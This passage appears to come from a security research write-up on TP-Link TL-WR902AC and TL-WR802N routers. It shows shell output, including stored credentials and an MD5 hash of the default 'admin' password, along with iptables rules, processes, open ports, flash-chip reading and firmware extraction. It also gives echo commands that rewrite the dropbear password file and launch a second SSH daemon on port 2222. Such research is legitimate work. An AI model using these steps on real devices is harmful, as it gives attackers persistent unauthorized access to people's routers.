admin:1234:1:1;guest:guest:0:0;test:test:1:1;$
# cat /etc/vsftpd.conf
anonymous_enable=NO
local_enable=YES
write_enable=YES
connect_from_port_20=YES
ascii_upload_enable=YES
ascii_download_enable=YES
listen=YES
chroot_local_user=YES
max_clients=2
ftpd_banner=Welcome to TP-LINK FTP server
pasv_min_port=50000
pasv_max_port=60000
# ls /var/tmp/dropbear/
dropbear_dss_host_key dropbear_rsa_host_key dropbearpwd
# cat /var/tmp/dropbear/dropbearpwd
username:admin
password:21232f297a57a5a743894a0e4a801fc3. <-- MD5("admin")
# Extracted from the Bootlog
# prepareDropbear cmd is "dropbearkey -t rsa -f /var/tmp/dropbear/dropbear_rsa_host_key"
# Will output 1024 bit rsa secret key to '/var/tmp/dropbear/dropbear_rsa_host_key'
# prepareDropbear cmd is "dropbearkey -t dss -f /var/tmp/dropbear/dropbear_dss_host_key"
# Will output 1024 bit dss secret key to '/var/tmp/dropbear/dropbear_dss_host_key'
# prepareDropbear cmd is "dropbear -p 22 -r /var/tmp/dropbear/dropbear_rsa_host_key -d /var/tmp/dropbear/dropbear_dss_host_key -A /var/tmp/dropbear/dropbearpwd"
It is also possible to add or change user credentials to work with SSH since the
/var directory is writable. Also dropbear can run on multiple ports. In a similar manner, using echo, it is possible to modify the passwd file in the /var directory.~ # cd /var/tmp/dropbear/
/var/tmp/dropbear # cat dropbearpwd
username:admin
password:21232f297a57a5a743894a0e4a801fc3
/var/tmp/dropbear # cp dropbearpwd dropbearpwd.bak
/var/tmp/dropbear # echo "username:test" > dropbearpwd
/var/tmp/dropbear # echo "password:21232f297a57a5a743894a0e4a801fc3" >> dropbearpwd
/var/tmp/dropbear # cat dropbearpwd
username:test
password:21232f297a57a5a743894a0e4a801fc3
# Start a new Dropbear instance
dropbear -p 2222 -r /var/tmp/dropbear/dropbear_rsa_host_key
ⓘ Default IPtables
# cat /var/tmp/dconf/rc.router
#!/bin/sh
#delete old rules
/etc/iptables-stop
#enable ip forward
echo "1" > /proc/sys/net/ipv4/ip_forward
/etc/iptables-stop
#set policy
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -N CTL
iptables -N FORWARD_DMZ
iptables -N FORWARD_UPNP
iptables -N FORWARD_UPNP_SECCONN
iptables -N FORWARD_PT
iptables -N FORWARD_VS
iptables -N FORWARD_VPN_PASSTHROUGH
iptables -N PARENTCTL
iptables -N PCRULE
iptables -N PCDROP
iptables -N FIREWALL
iptables -N FIREWALL_DDOS
iptables -N FWRULE
iptables -N FWD_MARK_LAN
iptables -N FWD_MARK_WAN
iptables -N OUTPUT_MARK_LOCAL
iptables -N BRIDGE_ISOLATION
iptables -t nat -N PREROUTING_DMZ
iptables -t nat -N PREROUTING_UPNP
iptables -t nat -N PREROUTING_UPNP_SECCONN
iptables -t nat -N PREROUTING_PT
iptables -t nat -N PREROUTING_VS
iptables -t nat -N POSTROUTING_NATLOOPBACK_VS
iptables -t nat -N POSTROUTING_NATLOOPBACK_UPNP
iptables -t nat -N NATLOOPBACK_UPNP_SECCONN
iptables -t nat -N POSTROUTING_NATLOOPBACK_DMZ
iptables -I OUTPUT -j OUTPUT_MARK_LOCAL
iptables -t filter -A FORWARD -o br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -j CTL
iptables -t filter -A FORWARD -i br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD ! -i br+ -j FORWARD_VS
iptables -A FORWARD -j FORWARD_PT
iptables -A FORWARD ! -i br+ -j FORWARD_UPNP
iptables -A FORWARD ! -i br+ -j FORWARD_UPNP_SECCONN
iptables -A FORWARD ! -i br+ -j FORWARD_DMZ
iptables -A FORWARD -j FORWARD_VPN_PASSTHROUGH
iptables -t nat -A PREROUTING ! -i br+ -d 255.255.255.255 -p udp --sport 67 --dport 68 -j ACCEPT
iptables -t nat -A PREROUTING -d 224.0.0.0/4 -j ACCEPT
iptables -t nat -A PREROUTING -j PREROUTING_VS
iptables -t nat -A PREROUTING -j PREROUTING_PT
iptables -t nat -A PREROUTING -j PREROUTING_UPNP
iptables -t nat -A PREROUTING -j PREROUTING_UPNP_SECCONN
iptables -t nat -A POSTROUTING -j POSTROUTING_NATLOOPBACK_VS
iptables -t nat -A POSTROUTING -j POSTROUTING_NATLOOPBACK_UPNP
iptables -t nat -A POSTROUTING -j NATLOOPBACK_UPNP_SECCONN
iptables -t nat -A POSTROUTING -j POSTROUTING_NATLOOPBACK_DMZ
iptables -t nat -A PREROUTING -j PREROUTING_DMZ
iptables -t filter -A FORWARD -i br+ -j ACCEPT
iptables -t filter -A FORWARD -d 224.0.0.0/4 -j ACCEPT
iptables -t filter -A INPUT -i lo -p ALL -j ACCEPT -m comment --comment "loop back"
iptables -t filter -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -t filter -A INPUT -d 224.0.0.0/4 -j ACCEPT
iptables -A INPUT -p udp ! -i br+ --sport 67 --dport 68 -j ACCEPT
iptables -A INPUT -p udp --dport 161 -j ACCEPT
# iptables -nvL
Chain INPUT (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
12 4449 ACCEPT all -- lo * 0.0.0.0/0 0.0.0.0/0 /* loop back */
2316 206K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
26 4240 ACCEPT all -- * * 0.0.0.0/0 224.0.0.0/4
0 0 ACCEPT udp -- !br+ * 0.0.0.0/0 0.0.0.0/0 udp spt:67 dpt:68
0 0 ACCEPT udp -- * * 0.0.0.0/0 0.0.0.0/0 udp dpt:161
216 14556 ACCEPT all -- br+ * 0.0.0.0/0 0.0.0.0/0
Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 ACCEPT all -- * br+ 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 CTL all -- * * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br+ * 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 FORWARD_VS all -- !br+ * 0.0.0.0/0 0.0.0.0/0
0 0 FORWARD_PT all -- * * 0.0.0.0/0 0.0.0.0/0
0 0 FORWARD_UPNP all -- !br+ * 0.0.0.0/0 0.0.0.0/0
0 0 FORWARD_UPNP_SECCONN all -- !br+ * 0.0.0.0/0 0.0.0.0/0
0 0 FORWARD_DMZ all -- !br+ * 0.0.0.0/0 0.0.0.0/0
0 0 FORWARD_VPN_PASSTHROUGH all -- * * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br+ * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * * 0.0.0.0/0 224.0.0.0/4
Chain OUTPUT (policy ACCEPT 1954 packets, 3746K bytes)
pkts bytes target prot opt in out source destination
1981 3755K OUTPUT_MARK_LOCAL all -- * * 0.0.0.0/0 0.0.0.0/0
Chain BRIDGE_ISOLATION (0 references)
pkts bytes target prot opt in out source destination
Chain CTL (1 references)
pkts bytes target prot opt in out source destination
Chain FIREWALL (0 references)
pkts bytes target prot opt in out source destination
Chain FIREWALL_DDOS (0 references)
pkts bytes target prot opt in out source destination
Chain FORWARD_DMZ (1 references)
pkts bytes target prot opt in out source destination
Chain FORWARD_PT (1 references)
pkts bytes target prot opt in out source destination
Chain FORWARD_UPNP (1 references)
pkts bytes target prot opt in out source destination
Chain FORWARD_UPNP_SECCONN (1 references)
pkts bytes target prot opt in out source destination
Chain FORWARD_VPN_PASSTHROUGH (1 references)
pkts bytes target prot opt in out source destination
Chain FORWARD_VS (1 references)
pkts bytes target prot opt in out source destination
Chain FWD_MARK_LAN (0 references)
pkts bytes target prot opt in out source destination
Chain FWD_MARK_WAN (0 references)
pkts bytes target prot opt in out source destination
Chain FWRULE (0 references)
pkts bytes target prot opt in out source destination
Chain OUTPUT_MARK_LOCAL (1 references)
pkts bytes target prot opt in out source destination
Chain PARENTCTL (0 references)
pkts bytes target prot opt in out source destination
Chain PCDROP (0 references)
pkts bytes target prot opt in out source destination
Chain PCRULE (0 references)
pkts bytes target prot opt in out source destination
ⓘ Running processes
PID USER VSZ STAT COMMAND
1 admin 1068 S init
2 admin 0 SW [kthreadd]
3 admin 0 SW [ksoftirqd/0]
4 admin 0 SW [kworker/0:0]
5 admin 0 SW [kworker/u:0]
6 admin 0 SW< [khelper]
7 admin 0 SW [kworker/u:1]
44 admin 0 SW [sync_supers]
46 admin 0 SW [bdi-default]
48 admin 0 SW< [kblockd]
79 admin 0 SW [kswapd0]
81 admin 0 SW< [crypto]
642 admin 0 SW [mtdblock0]
647 admin 0 SW [mtdblock1]
652 admin 0 SW [mtdblock2]
657 admin 0 SW [mtdblock3]
662 admin 0 SW [mtdblock4]
667 admin 0 SW [mtdblock5]
672 admin 0 SW [mtdblock6]
690 admin 0 SW [kworker/0:1]
731 admin 0 SW [khubd]
777 admin 3132 S cos
778 admin 1068 S /bin/sh
867 admin 2300 S igmpd
870 admin 2320 S mldProxy
871 admin 3132 S cos
872 admin 3132 S cos
873 admin 3132 S cos
876 admin 2264 S ntpc
880 admin 2272 S dyndns /var/tmp/dconf/dyndns.conf
883 admin 2272 S noipdns /var/tmp/dconf/noipdns.conf
886 admin 2272 S cmxdns /var/tmp/dconf/cmxdns.conf
982 admin 0 SW [RtmpCmdQTask]
983 admin 0 SW [RtmpWscTask]
984 admin 0 SW [RtmpMlmeTask]
997 admin 1244 S wlNetlinkTool
1000 admin 1244 S wlNetlinkTool
1001 admin 1244 S wlNetlinkTool
1003 admin 1080 S wscd -i ra0 -m 1 -w /var/tmp/wsc_upnp/
1042 admin 0 SW [RtmpCmdQTask]
1043 admin 0 SW [RtmpWscTask]
1058 admin 1080 S wscd_5G -i rai0 -m 1 -w /var/tmp/wsc_upnp_5G/
1062 admin 2840 S httpd
1065 admin 1764 S upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
1077 admin 2260 S dnsProxy
1080 admin 1068 S dhcpd /var/tmp/dconf/udhcpd.conf
1097 admin 1156 S dhcp6s -c /var/tmp/dconf/dhcp6s_br0.conf -P /var/run
1100 admin 2880 S tmpd
1104 admin 1764 S upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
1105 admin 1764 S upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
1106 admin 1764 S upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
1107 admin 1764 S upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
1108 admin 1764 S upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
1109 admin 1764 S upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
1110 admin 1764 S upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
1111 admin 2740 S tdpd
1115 admin 992 R dhcpc
1124 admin 1036 S zebra -d -f /var/tmp/dconf/zebra.conf
1138 admin 2264 S diagTool
1187 admin 2464 S ushare
1193 admin 2464 S ushare
1195 admin 2464 S ushare
1196 admin 2464 S ushare
1197 admin 2464 S ushare
1198 admin 2464 S ushare
1199 admin 2464 S ushare
1202 admin 2464 S ushare
1215 admin 904 S vsftpd
1219 admin 3908 S smbd -D
1226 admin 3908 S smbd -D
1264 admin 2788 S tddp
1285 admin 1136 S dropbear -p 22 -r /var/tmp/dropbear/dropbear_rsa_hos
1292 admin 1060 R ps
ⓘ Interface Configuration
eth0 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FC
eth0.3 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FC
eth0.4 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FC
eth0.5 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FC
eth0.6 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FC
ra0 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FC
br0 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FC
LAN inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
eth0.2 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FD
WAN inet addr:192.168.0.101 Bcast:192.168.0.255 Mask:255.255.255.0
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
rai0 Link encap:Ethernet HWaddr 98:DA:C4:6E:00:FB
ⓘ Wireless Intercafe Configuration
lo no wireless extensions.
ifb0 no wireless extensions.
ifb1 no wireless extensions.
sit0 no wireless extensions.
ip6tnl0 no wireless extensions.
eth0 no wireless extensions.
br0 no wireless extensions.
eth0.3 no wireless extensions.
eth0.4 no wireless extensions.
eth0.5 no wireless extensions.
eth0.6 no wireless extensions.
eth0.2 no wireless extensions.
ra0 RTWIFI SoftAP ESSID:"TP-Link_00FC"
Mode:Managed Channel=3 Access Point: 98:DA:C4:6E:00:FC
Bit Rate=300 Mb/s
ra1 RTWIFI SoftAP ESSID:"TP-Link_Guest_00FC"
Mode:Managed Channel=3 Access Point: 9A:DA:C4:7E:00:FC
Bit Rate=300 Mb/s
apcli0 RTWIFI SoftAP ESSID:""
Mode:Managed Channel=3 Access Point: Not-Associated
Bit Rate:300 Mb/s
rai0 RTWIFI SoftAP ESSID:"TP-Link_00FC_5G"
Mode:Managed Channel=36 Access Point: 98:DA:C4:6E:00:FB
Bit Rate=433.5 Mb/s
rai1 RTWIFI SoftAP ESSID:"TP-Link_Guest_00FC_5G"
Mode:Managed Channel=36 Access Point: 9A:DA:C4:6C:00:FB
Bit Rate=433.5 Mb/s
apclii0 RTWIFI SoftAP ESSID:""
Mode:Managed Channel=36 Access Point: Not-Associated
Bit Rate:150 Mb/s
ⓘ Open Ports
cat /proc/net/tcp
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 0100007F:4E22 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 604 1 830ec040 300 0 0 2 -1
1: 0101A8C0:008B 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 1057 1 830ed580 300 0 0 2 -1
2: 00000000:076C 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 618 1 830ec480 300 0 0 2 -1
3: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 548 1 830ed9c0 300 0 0 2 -1
4: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 1029 1 830ecd00 300 0 0 2 -1
5: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 1090 1 80c279e0 300 0 0 2 -1
6: 00000000:9FFB 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 994 1 830ec8c0 300 0 0 2 -1
7: 0101A8C0:01BD 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 1056 1 830ed140 300 0 0 2 -1
8: 0101A8C0:0050 6401A8C0:D633 06 00000000:00000000 03:000001C8 00000000 0 0 0 3 832f6840<
/* Resolved
sl local_address rem_address
0: 127.0.0.1 :20002
1: 192.168.1.1 :139
2: 0.0.0.0 :190
3: 0.0.0.0 :80
4: 0.0.0.0 :21
5: 0.0.0.0 :22
6: 0.0.0.0 :40955
7: 192.168.1.1 :445
// Client connection
8: 192.168.1.1 :80 192.168.1.100:54445*/
Exploit Memory Chips
In-Circuit
SPI Flash
Both examined devices use SPI NOR Flash (SOP8) to store data and/or (parts of) the firmware. The TL-WR902AC additionally uses a NAND flash chip, to which the chip-off data extraction needs to be applied. SPI (Serial Peripheral Interface) is a serial interface similar to UART. However, it is mainly used for communication between hardware components and offers a simple and efficient alternative to parallel bus systems following a master/slave architecture, which makes it very suitable for embedded applications. The focus of this work is on the use of SPI in combination with flash chips. With certain chip packages (e.g., SOP8/16), all data of the flash chip can be retrieved using SPI without having to unsolder the flash chip. In-Circuit Data Extraction allows chips to be read out without having to desolder them, which is only possible with chips of certain packages where the leads are exposed. Examples are NOR flash chips and EEPROMs of the Small-Outline Package (SOP), which use SPI or I2C. The SOP8 chips in this case could be read out using an SOP8 Clip and a CH341H programmer.
Note: TL-WR902AC: [2.pdf 25Q64CSIG]. TL-WR802N: Winbond 25Q64JVS10. Not processed yet.
Firmware
Download
Current Version
Note: VX describes the Hardware version X
Warning: Need to review links and complete the list.
TL-WR902AC
| CC | Hardware Version |
|---|---|
| US | V1, V3 |
| EU | V1, V3 |
| JP | V1, V3 |
TL-WR802N
| CC | Hardware Version |
|---|---|
| US | V1, V2, V4 |
| DE | V1, V2, V3, V4 |
| AT | V1, V2 |
| JP | V1, V2, V3, V4 |
Known Versions
TL-WR902AC
| CC | HW | Firmware Version |
|---|---|---|
| EU | V1 | 170628, 160905 |
| US | V1 | 160905 |
| EU | V3 | 191018, 170828, 170717 |
| US | V3 | 191209, 171229, 170826 |
Third-Party-Firmware
The original firmware of some TP-Link products can be replaced with third-party firmware such as DD-WRT. TP-Link is not obligated to provide support or warranty for such modified devices, nor is it responsible for their stability or performance. TP-Link will not replace any damage caused by third-party firmware.
Extraction
ⓘ Using firmware-mod-kit
$ ./firmware-mod-kit/extract-firmware.sh ./Firmware/V3/TL-WR902AC(EU)_V3_191018/TL-WR902ACv3_EU_0.9.1_0.3_up_boot[191018-rel34369].bin Firmware Mod Kit (extract) 0.99, (c)2011-2013 Craig Heffner, Jeremy Collake Scanning firmware... Scan Time: 2020-06-20 03:58:35 Target File: ./Firmware/V3/TL-WR902AC(EU)_V3_191018/TL-WR902ACv3_EU_0.9.1_0.3_up_boot[191018-rel34369].bin MD5 Checksum: 4e87ca6fb7717bb509e843fbac2d060e Signatures: 344 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 82384 0x141D0 U-Boot version string, "U-Boot 1.1.3 (Oct 18 2019 - 09:12:58)" 132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 3634292 bytes 1442304 0x160200 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 6375860 bytes, 759 inodes, blocksize: 131072 bytes, created: 2019-10-18 01:32:50 Extracting 1442304 bytes of header image at offset 0 Extracting squashfs file system at offset 1442304 Extracting squashfs files... Firmware extraction successful!
GPL Code
TL-WR902AC
| CC | Hardware Version |
|---|---|
| US | V1, V3 |
| EU |
Note: GPL-Code-Center
Warning: Had a bad day? Try some developer notes! 谢谢!
ⓘ Developer notes
/* Find it out, where you are? ^_^, update config first */
/* Bug ^_^ be careful */
/* Do not care about the others now */
default:
DEBUG("we don't care it,^_^!");
break;
}
/*
* brief: just rebuild all ,so what about big big disk? just pray ^_^
* maybe use sqlite... in the future.
*/
/* Do it again and again are you tired ^_^? */
/* For passing test, and let the customer be happy, we ... ^_^, it is not so bad */
References
TP-Link
| Description | Link |
|---|---|
| TP-Link | https://www.tp-link.com/at/ (accessed 20 June 2020) https://www.tp-link.com/us/ (accessed 20 June 2020) |
| Awards | https://www.tp-link.com/at/press/award/ (accessed 20 June 2020) |
TP-Link TL-WR902AC: AC750 Wifi - Travel Router
| Description | Link |
|---|---|
| Product | https://www.tp-link.com/at/home-networking/wifi-router/tl-wr902ac/ (accessed 20 June 2020) https://www.tp-link.com/us/home-networking/wifi-router/tl-wr902ac/ (accessed 19 June 2020) |
| Support | https://www.tp-link.com/at/support/download/tl-wr902ac/ (accessed 20 June 2020) https://www.tp-link.com/us/support/download/tl-wr902ac/ (accessed 20 June 2020) |
| Datasheet | https://static.tp-link.com/TL-WR902AC.pdf (accessed 19 June 2020) |
TP-Link TL-WR802N: 300Mbps Wireless N - Nano Router
| Description | Link |
|---|---|
| Product | https://www.tp-link.com/at/home-networking/wifi-router/tl-wr802n/ (accessed 24 June 2020) https://www.tp-link.com/us/home-networking/wifi-router/tl-wr802n/ (accessed 24 June 2020) |
| Support | https://www.tp-link.com/at/support/download/tl-wr802n/ (accessed 24 June 2020) https://www.tp-link.com/us/support/download/tl-wr802n/ (accessed 24 June 2020) |
| Datasheet | https://static.tp-link.com/2018/201810/20181022/TL-WR802N(EU&US)%204.0-datasheet.pdf (accessed 24 June 2020) |
Other
| Description | Link |
|---|---|
| Dropbear Configuration | https://openwrt.org/docs/guide-user/base-system/dropbear (accessed 28 June 2020) |
Vulnerability Reports
| Description | Link |
|---|---|
| TL-WR840N (1) | https://www.cvedetails.com/cve/CVE-2019-15060/ |
| Busybox 1.19.2 (5) | https://www.cvedetails.com (accessed 1 July 2020) |
| Linux 2.6.36 (233) | https://www.cvedetails.com (accessed 1 July 2020) |
| TP-Link (123) | https://www.cvedetails.com (accessed 1 July 2020) |